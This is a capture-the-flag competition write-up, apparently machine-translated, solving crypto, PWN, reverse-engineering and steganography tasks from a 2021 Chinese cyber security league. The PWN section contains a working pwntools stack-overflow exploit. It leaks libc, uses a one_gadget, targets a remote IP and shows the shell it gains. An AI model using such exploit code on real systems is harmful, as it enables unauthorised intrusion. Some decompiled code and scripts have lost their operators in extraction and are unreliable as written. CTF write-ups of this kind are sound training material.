Title: 2021 Spring and Autumn Cup Cyber Security League Autumn Stage writeup

Crypto

Vigenere

Blasting at https://www.boxentriq.com/code-breaking/vigenere-cipher website gets key:asterism

Decryption to obtain falg.

or

According to the title Vigenere, it can be seen that it is Virginia password

Cracking with online decoding tools

https://guballa.de/vigenere-solver

flag: flag{53d613fc-6c5c-4dd6-b3ce-8bc867c6f648}

PWN

supercall

Simple stack overflow, use LibcSearcher to find the libc base address through the real address of _IO_2_1_stdin_ leaked from the question, and use one_gatget to get the shell.

#!/usr/bin/env python# -*- encoding: utf-8 -*-'''@File : exp.py@Time : 2021/11/27 13:393:07@Author : lexsd6''''from pwn import * from libcfind import *local_mote=0elf='./supercall'e=ELF(elf)#context.log_level='debug'context.arch=e.archip_port=['123.57.207.81',16985]debug=lambda : gdb.attach(p) if local_mote==1 else Noneif local_mote==1 : p=process(elf)else : p=remote(ip_port[0],ip_port[-1])#0x000000000000026796 : pop rdi ; retstack_addr=int(p.recvuntil(',')[:-1],16)stdin_addr=int(p.recv(),16)log.info(hex(stack_addr))log.info(hex(stdin_addr))x=finder('_IO_2_1_stdin_',stdin_addr,num=9)#[-] 9: local-46e93283ff531:e02a73ae5b5ba375410855 (source from:/mnt/d/filewsl/supercall/libc-2.27.so)p.sendline('1'*8+'2'*8+'3'*7)p.sendline('\x00'*0x10+'x'*8+p64(x.ogg(num=0)))'''[-] 0:0x4f3d5 execve('/bin/sh', rsp+0x40, environment)constraints: rsp0xf==0 rcx==NULL'''p.interactive()

Then in the remote cat flag.

[+] you choose gadget:0x4f3d5[*] Switching to interact mode$ lsbindevflagliblib32lib64supercall$ cat f*flag{2f3f3632-6484-4c00-82f3-a63e0d4340d9}$

RESnake

I found that the question has a UPX shell. After unshelling, I opened it with Ida to review and found a suspected encrypted flag function.

int sub_40186F(){ char v1[256]; //[esp+18h] [ebp-910h] char Dst[2048]; //[esp+118h] [ebp-810h] int j; //[esp+918h] [ebp-10h] int i; //[esp+91Ch] [ebp-Ch] sub_4021AD(22, 18); scanf('%s', v1); for ( i=0; v1[i]; ++i ) ; sub_4017D2(v1, i);#fun2 memset(Dst, 0,0x800u); sub_4015F7(v1, Dst, i); #fun1 sub_4021AD(22, 20); for ( j=0; Dst[j]; ++j ) { if ( Dst[j] !=a7g5d5bayTmdlwl[j] ) return puts('Not right~ Come again next time~'); } return puts(asc_405016);}

Continue to follow up on fun2 and find:

int __cdecl sub_4017D2(int a1, int a2){ int result; //eax int j; //[esp+8h] [ebp-Ch] signed int i; //[esp+Ch] [ebp-8h] for ( i=1; i=10; ++i ) { for ( j=0; ++j ) { result=*(unsigned __int8 *)(j + a1); if ( !(_BYTE)result ) break; if ( a2 % i ) *(_BYTE *)(j + a1) ^=(_BYTE)i + (_BYTE)j; else *(_BYTE *)(j + a1) ^=(unsigned __int8)(j % i) + (_BYTE)j; } } return result;}

It is to use our input string, and each character is operated according to the position.

fun1 is the base64 encryption of the string.

while ( v16 a3 ){ v3=v13; v14=v13 + 1; *(_BYTE *)(a2 + v3)=Str[((signed int)*(unsigned __int8 *)(v16 + a1) 2)0x3F]; v11=16 * *(_BYTE *)(v16 + a1)0x30; if ( v16 + 1=a3 ) { v4=v14; v5=v14 + 1; *(_BYTE *)(a2 + v4)=Str[v11]; *(_BYTE *)(v5 + a2)='='; v6=v5 + 1; v13=v5 + 2; *(_BYTE *)(v6 + a2)='='; break; } v7=v14; v15=v14 + 1; *(_BYTE *)(a2 + v7)=Str[((signed int)*(unsigned __int8 *)(v16 + 1 + a1) 4)0xF | v11]; v12=4 * *(_BYTE *)(v16 + 1 + a1)0x3C; if ( v16 + 2=a3 ) { *(_BYTE *)(a2 + v15)=Str[v12]; v8=v15 + 1; v13=v15 + 2; *(_BYTE *)(v8 + a2)='='; break; } *(_BYTE *)(a2 + v15)=Str[((signed int)*(unsigned __int8 *)(v16 + 2 + a1) 6) 3 | v12]; v9=v15 + 1; v13=v15 + 2; *(_BYTE *)(a2 + v9)=Str[*(_BYTE *)(v16 + 2 + a1)0x3F]; v16 +=3;}

However, during debugging, I found that before fun1, a function changed the global variable str value.

This function is as follows:

signed int sub_401536(){ char v0; //ST13_1 signed int result; //eax signed int v2; //[esp+14h] [ebp-14h] int j; //[esp+18h] [ebp-10h] int i; //[esp+1Ch] [ebp-Ch] v2=strlen('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'); for ( i=0; v2/2 i; ++i ) { for ( j=0; v2 - i - 1 j; ++j ) { if ( Str[j] Str[j + 1] ) { v0=Str[j]; Str[j]=Str[j + 1]; Str[j + 1]=v0; } } } result=1; dword_406060=1; return result;}

So I wrote a script to fulfill my wish:

base_flag=[]#x='7G5d5bAy+TMdLWlu5CdkMTlcJnwkNUgb2AQL3CcmPpVf6DAp72scOSlb'x='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'v2=len('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')'''for ( i=0; v2/2 i; ++i ) { for ( j=0; v2 - i - 1 j; ++j ) { if ( Str[j] Str[j + 1] ) { v0=Str[j]; Str[j]=Str[j + 1]; Str[j + 1]=v0; } }''' for i in x: base_flag.append(ord(i))print(base_flag) for i in range(v2//2): for j in range(v2-i-1): if base_flag[j]base_flag[j+1]: v0=base_flag[j] base_flag[j]=base_flag[j+1] base_flag[j+1]=v0

Get the real str: ABCDEFGHIJKLMNOPQRST0123456789+/UVWXYZabcdefghijklmnopqrstuvwxyz

In reverse-commuting the source of fun1 and fun2 functions, get flag:

import base64table='ABCDEFGHIJKLMNOPQRST0123456789+/UVWXYZabcdefghijklmnopqrstuvwxyz'table2='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'tmp='7G5d5bAy+TMdLWlu5CdkMTlcJnwkNUgb2AQL3CcmPpVf6DAp72scOSlb'tmp2=''for i in tmp:index=table.index(i)tmp2 +=table2[index]k=base64.b64decode(tmp2+'==')nre=''kk=[]for i in range(len(k)): kk.append(ord(k[i]))print(kk)a2=len(kk)for i in range((10)): i=i+1 for j in range(len(kk)): print(str(a2%i)+''+str(i)) if a2%i!=0: kk[j]^=(i+j) else : kk[j]^=((j%i)+j) print(kk)#print(k)print(kk)flag=''for i in (kk): flag+=chr(i)print(flag)Exit flag

flag{5e2200bc-f21a-5421-a90b-57dec19fe196}

MISC

Questions

After filling in the form, there will be flags

flag{Let us bring a sense of security to the world together}

helloshark

A picture 010 Open it and found that there are many PK words in the hexadecimal system. The image is separated and processed (foremost). Sure enough, the compressed package is hidden, but the compressed package sets a password, prompting the password in the picture guessing that the picture has LSB steganography, and use the tool zsteg for detection You can see that the password is @91902AF23C#276C2FC7EAC615739CC7C0 decompress the compressed package, and open the traffic packet to track the TCP flow

Splicing flag Get flag: flag{a4e0a418-fced-4b2d-9d76-fdc9053d69a1}

secret_chart

A picture The same-looking, pull 010, separate and get an encrypted compressed package Password does not give any prompts, try to blast, succeed, password 9527 Unzip, open excel file The table is composed of 6 months, the left and bottom sides are 1, guess it is the QR code that puts the 6 months data together first, and unify the row height and column width Add a conditional format. When the string contains 1, the background is filled with black. WeChat cannot scan it. Screenshot QR code DataMatrix QR code online decoding tool http://boy.co.ua/decode.php decodes to get a string like flag zfua{B3s1o9in1Nw0halUnofuNc0HM1} Caesar password decryption Get flag: flag{H3y1u9ot1Tc0ngrAtulaTi0NS1}

from:https://lexsd6.github.io/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B%E7%A7%8B%E5%AD%A3%E8%B5%9B%E5%8B%87%E8%80%85%E5%B1%B1%E5%B3%B0/#Crypto